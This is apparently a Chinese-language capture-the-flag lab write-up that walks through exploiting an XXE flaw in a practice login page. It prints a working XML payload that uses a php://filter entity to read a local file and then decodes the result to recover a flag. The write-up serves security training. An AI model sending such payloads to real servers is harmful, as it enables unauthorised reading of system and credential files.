XXE-Lab靶场漏洞复现

1.尝试登录

输入账号admin/密码admin进行登录,并未有页面进行跳转

2.尝试抓包分析请求包数据

我们可以发现页面中存在xml请求,我们就可以构造我们的xml请求语句来获取想要的数据

3.构造语句

复制代码
<?xml version="1.0" ?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=c:/flag/flag">
]>
&xxe;

这里我们需要将xml语句放入post请求体中并发送

如上图所示便是我们需要获取的数据

4.数据解码

将获取的数据进行解码后我们即可得到我们的flag

flag{dmsioamdoiasdmdmwmdsmd}

相关推荐
消失的旧时光-19431 小时前
Android网络框架封装 ---> Retrofit + OkHttp + 协程 + LiveData + 断点续传 + 多线程下载 + 进度框交互
android·网络·retrofit
zcychong2 小时前
Handler(二):Java层源码分析
android
Chef_Chen4 小时前
从0开始学习R语言--Day58--竞争风险模型
android·开发语言·kotlin
用户2018792831674 小时前
演员的智能衣橱系统之Selector选择器
android
CYRUS_STUDIO4 小时前
OLLVM 混淆 + VMP 壳照样破!绕过加壳 SDK 的核心检测逻辑
android·逆向·汇编语言
Kapaseker5 小时前
憋了一周了,12000字深入浅出Android的Context机制
android
betazhou5 小时前
MySQL ROUTER安装部署
android·数据库·mysql·adb·mgr·mysql router
用户2018792831675 小时前
🧙‍♂️ 故事:像素王国的“贴纸工厂”与“圣殿徽章工坊”
android
用户2018792831675 小时前
浅谈Android资源国王的故事
android